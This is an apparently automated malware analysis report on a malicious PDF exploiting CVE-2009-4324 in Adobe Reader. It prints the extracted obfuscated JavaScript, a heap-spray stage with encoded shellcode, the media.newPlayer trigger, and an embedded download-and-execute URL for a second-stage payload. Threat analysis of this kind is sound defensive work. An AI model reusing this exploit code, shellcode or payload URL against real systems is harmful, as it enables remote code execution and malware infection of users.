Malicious PDF — malware analysis report

Static analysis result for SHA-256 75473cb1c41613df…

MALICIOUS

PDF

43.2 KB
MD5: 0408be6f974ac4f4770807a5b029a353 SHA-1: 88a25351c11de4051c3e06e0583a6162cf24b1c5 SHA-256: 75473cb1c41613dff2983c5b4e94cd273ed8232401ab8edc5db0a029fb2649ef
150 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits CVE-2009-4324 using the media.newPlayer API. This script is designed to download a second-stage payload from the URL http://gwraddkkda.in/and/post.php?e=8&&. The critical heuristic firing for CVE_2009_4324 and the high-confidence heuristic for a shellcode download URL strongly indicate this malicious behavior.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 6

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://gwraddkkda.in/and/post.php?e=8&& Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0008_000.js
0089af380bb502e605cfb8bcc528f2ef7a3c8c1e416a943104cc36dfdbc5830d		 pdf-javascript-stream PDF /JS object 8 at offset 0x1E7 2221 bytes
Preview script
First 1,000 lines of the extracted script
function dddsddsgdrvssafdgddddd(iiosooosoos)
{
if(iiosooosoos ==1/*iiosooosoos*/) return ( /*iiosooosoos*/  ""+ /*iiosooosoos*/    app["v"+"ie"/*iiosooosoos*/+""/*iiosooosoos*/+"werTy"+app.doc.URL[3]+"e"][1] /*iiosooosoos*/   );
if(iiosooosoos ==2/*iiosooosoos*/) return (  /*iiosooosoos*/ ""+  /*iiosooosoos*/   "%x".replace(/x/,"")  /*iiosooosoos*/  );
if(iiosooosoos ==3/*iiosooosoos*/) return ( /*iiosooosoos*/  ""+  /*iiosooosoos*/      "ax".replace(/x/,"") /*iiosooosoos*/);
}

var /*iiosooosoos*/cCrFqalPHj77/*iiosooosoos*/ = /*iiosooosoos*/this/*iiosooosoos*/; /*iiosooosoos*/

var nfffJccIfn89 =["",dddsddsgdrvssafdgddddd(1),dddsddsgdrvssafdgddddd(2),dddsddsgdrvssafdgddddd(3),"","","o","s","c","i","g","t","r","u","n","p"];
/*iiosooosoos*/

var /*iiosooosoos*/cCrFqalPHj77z/*iiosooosoos*/ =/*iiosooosoos*/ app/*iiosooosoos*/; /*iiosooosoos*/
var PLJcutlTjR1 = nfffJccIfn89[1];
var lwutDZCLIS3 = nfffJccIfn89[2];
var ajpyILkmZx17 = cCrFqalPHj77[PLJcutlTjR1+"v"+nfffJccIfn89[3]+"l"];
var LkjDeLJUKC18 = cCrFqalPHj77[nfffJccIfn89[13]+nfffJccIfn89[14]+PLJcutlTjR1+"s"+nfffJccIfn89[8]+nfffJccIfn89[3]+nfffJccIfn89[15]+PLJcutlTjR1];


ajpyILkmZx17("v"+nfffJccIfn89[3]+"r KlrucFqztA15 = /"+nfffJccIfn89[7]+nfffJccIfn89[8]+nfffJccIfn89[8]+"/"+nfffJccIfn89[9]+nfffJccIfn89[10]+";");

var XeHFqNpbZL10 = cCrFqalPHj77z[/*iiosooosoos*/     "d"+nfffJccIfn89[7-1]+nfffJccIfn89[7+1]];

XeHFqNpbZL10[nfffJccIfn89[7]+"yn"+nfffJccIfn89[8]+"A"+nfffJccIfn89[14]+nfffJccIfn89[14]+"o"+nfffJccIfn89[11]+"S"+nfffJccIfn89[8]+nfffJccIfn89[3]+"n"]();

var DYdMAYGmsq4 = XeHFqNpbZL10[nfffJccIfn89[10]+PLJcutlTjR1+"tAnn"+nfffJccIfn89[6]+nfffJccIfn89[11]+nfffJccIfn89[7]](0);

var EWjrqbaQjd5 = DYdMAYGmsq4[0][nfffJccIfn89[7]+"ubj"+PLJcutlTjR1+nfffJccIfn89[8]+nfffJccIfn89[11]];

var gUaaOeAQpJ6 = EWjrqbaQjd5/*iiosooosoos*/[nfffJccIfn89/*iiosooosoos*/[11+1]+PLJcutlTjR1+/*iiosooosoos*/nfffJccIfn89[15]+"l"/*iiosooosoos*/+nfffJccIfn89/*iiosooosoos*/[3]+nfffJccIfn89/*iiosooosoos*/[8]+PLJcutlTjR1]/*iiosooosoos*/(KlrucFqztA15,lwutDZCLIS3);

var isiLFjkMWc7=LkjDeLJUKC18(LkjDeLJUKC18(gUaaOeAQpJ6));
ajpyILkmZx17(isiLFjkMWc7);

if(j){
function run(){util[vvv2](vvv, new Date());}
run();run();
try {this[vvv4][vvv3](null);} catch(e) {}
run();
}
javascript_obj0008_001.js
9a09e85d4b10d3522043378c9041956321ab0d71d865a83096c715d9340a1322		 pdf-javascript-stream PDF /JS object 8 at offset 0x209 43689 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function dddsddsgdrvssafdgddddd(iiosooosoos)
{
if(iiosooosoos ==1/*iiosooosoos*/) return ( /*iiosooosoos*/  ""+ /*iiosooosoos*/    app["v"+"ie"/*iiosooosoos*/+""/*iiosooosoos*/+"werTy"+app.doc.URL[3]+"e"][1] /*iiosooosoos*/   );
if(iiosooosoos ==2/*iiosooosoos*/) return (  /*iiosooosoos*/ ""+  /*iiosooosoos*/   "%x".replace(/x/,"")  /*iiosooosoos*/  );
if(iiosooosoos ==3/*iiosooosoos*/) return ( /*iiosooosoos*/  ""+  /*iiosooosoos*/      "ax".replace(/x/,"") /*iiosooosoos*/);
}

var /*iiosooosoos*/cCrFqalPHj77/*iiosooosoos*/ = /*iiosooosoos*/this/*iiosooosoos*/; /*iiosooosoos*/

var nfffJccIfn89 =["",dddsddsgdrvssafdgddddd(1),dddsddsgdrvssafdgddddd(2),dddsddsgdrvssafdgddddd(3),"","","o","s","c","i","g","t","r","u","n","p"];
/*iiosooosoos*/

var /*iiosooosoos*/cCrFqalPHj77z/*iiosooosoos*/ =/*iiosooosoos*/ app/*iiosooosoos*/; /*iiosooosoos*/
var PLJcutlTjR1 = nfffJccIfn89[1];
var lwutDZCLIS3 = nfffJccIfn89[2];
var ajpyILkmZx17 = cCrFqalPHj77[PLJcutlTjR1+"v"+nfffJccIfn89[3]+"l"];
var LkjDeLJUKC18 = cCrFqalPHj77[nfffJccIfn89[13]+nfffJccIfn89[14]+PLJcutlTjR1+"s"+nfffJccIfn89[8]+nfffJccIfn89[3]+nfffJccIfn89[15]+PLJcutlTjR1];


ajpyILkmZx17("v"+nfffJccIfn89[3]+"r KlrucFqztA15 = /"+nfffJccIfn89[7]+nfffJccIfn89[8]+nfffJccIfn89[8]+"/"+nfffJccIfn89[9]+nfffJccIfn89[10]+";");

var XeHFqNpbZL10 = cCrFqalPHj77z[/*iiosooosoos*/     "d"+nfffJccIfn89[7-1]+nfffJccIfn89[7+1]];

XeHFqNpbZL10[nfffJccIfn89[7]+"yn"+nfffJccIfn89[8]+"A"+nfffJccIfn89[14]+nfffJccIfn89[14]+"o"+nfffJccIfn89[11]+"S"+nfffJccIfn89[8]+nfffJccIfn89[3]+"n"]();

var DYdMAYGmsq4 = XeHFqNpbZL10[nfffJccIfn89[10]+PLJcutlTjR1+"tAnn"+nfffJccIfn89[6]+nfffJccIfn89[11]+nfffJccIfn89[7]](0);

var EWjrqbaQjd5 = DYdMAYGmsq4[0][nfffJccIfn89[7]+"ubj"+PLJcutlTjR1+nfffJccIfn89[8]+nfffJccIfn89[11]];

var gUaaOeAQpJ6 = EWjrqbaQjd5/*iiosooosoos*/[nfffJccIfn89/*iiosooosoos*/[11+1]+PLJcutlTjR1+/*iiosooosoos*/nfffJccIfn89[15]+"l"/*iiosooosoos*/+nfffJccIfn89/*iiosooosoos*/[3]+nfffJccIfn89/*iiosooosoos*/[8]+PLJcutlTjR1]/*iiosooosoos*/(KlrucFqztA15,lwutDZCLIS3);

var isiLFjkMWc7=LkjDeLJUKC18(LkjDeLJUKC18(gUaaOeAQpJ6));
ajpyILkmZx17(isiLFjkMWc7);

if(j){
function run(){util[vvv2](vvv, new Date());}
run();run();
try {this[vvv4][vvv3](null);} catch(e) {}
run();
}
endstream
endobj
7 0 obj
<<
/Length 41160
>>
stream
scc25scc30scc41scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc32scc30scc25scc33scc44scc25scc32scc30scc25scc36scc31scc25scc37scc30scc25scc37scc30scc25scc32scc45scc25scc37scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc34scc39scc25scc36scc45scc25scc37scc33scc25scc33scc42scc25scc30scc41scc25scc36scc36scc25scc36scc46scc25scc37scc32scc25scc32scc30scc25scc32scc38scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc39scc25scc33scc44scc25scc33scc30scc25scc33scc42scc25scc32scc30scc25scc36scc39scc25scc32scc30scc25scc33scc43scc25scc32scc30scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc32scc45scc25scc36scc43scc25scc36scc35scc25scc36scc45scc25scc36scc37scc25scc37scc34scc25scc36scc38scc25scc33scc42scc25scc32scc30scc25scc36scc39scc25scc32scc42scc25scc32scc42scc25scc32scc39scc25scc37scc42scc25scc30scc41scc25scc36scc39scc25scc36scc36scc25scc32scc30scc25scc32scc38scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc35scc42scc25scc36scc39scc25scc35scc44scc25scc32scc45scc25scc36scc45scc25scc36scc31scc25scc36scc44scc25scc36scc35scc25scc33scc44scc25scc33scc44scc25scc32scc32scc25scc34scc35scc25scc35scc33scc25scc36scc33scc25scc37scc32scc25scc36scc39scc25scc37scc30scc25scc37scc34scc25scc32scc32scc25scc32scc39scc25scc37scc42scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc43scc25scc37scc36scc25scc33scc44scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc35scc42scc25scc36scc39scc25scc35scc44scc25scc
... (truncated)
legacy_pdfkit_stage_000.js
e25eb9dea927fc4a67324232040e7bccd1874be12a367fce24d0ca6ae7a3286e		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0xAC8 2744 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var aPlugins = app.plugIns;
for (var i=0; i < aPlugins.length; i++){
if (aPlugins[i].name=="EScript"){var lv=aPlugins[i].version;}}
if ((lv>9)&&(lv<9.3)){var j=1400;} else if((lv>8.12)&&(lv<8.2)){var j=2900;}else{}
s=new Array();
var sh = "%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3%uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589%u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE%uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75%u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08%uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC%u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6%u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC%uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D%u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708%u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000%u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856%u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D%u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8%u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351%u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A%uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45%u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u672F%u7277%u6461%u6B64%u646B%u2E61%u6E69%u612F%u646E%u702F%u736F%u2E74%u6870%u3F70%u3D65%u2638%u0026";
var str="%u9090%u9090";
sh=unescape(sh);str=unescape(str);
while(str.length <= 0x8000) {str+=str;}
str=str.substr(0,0x8000 - sh.length);
for(i=0;i<j;i++) {s[i]=str + sh;}
var vvv = "p@111111111111111111111111 : yyyy111";
var vvv2 = "printd";
var vvv3 = "newPlayer";
var vvv4 = "media";
legacy_pdfkit_stage_001.js
42025b552c7960b53abcd8cd732b01c8d109eccfdfefc352b9826c4d5807d414		 deobfuscated-js cross-stage annotation API aliases at offset 0x1E7 81 bytes
Preview script
First 1,000 lines of the extracted script
media.newPlayer(null); /* alias values recovered from decoded annotation stage */

Open this report in the interactive analyzer, or submit your own file for analysis.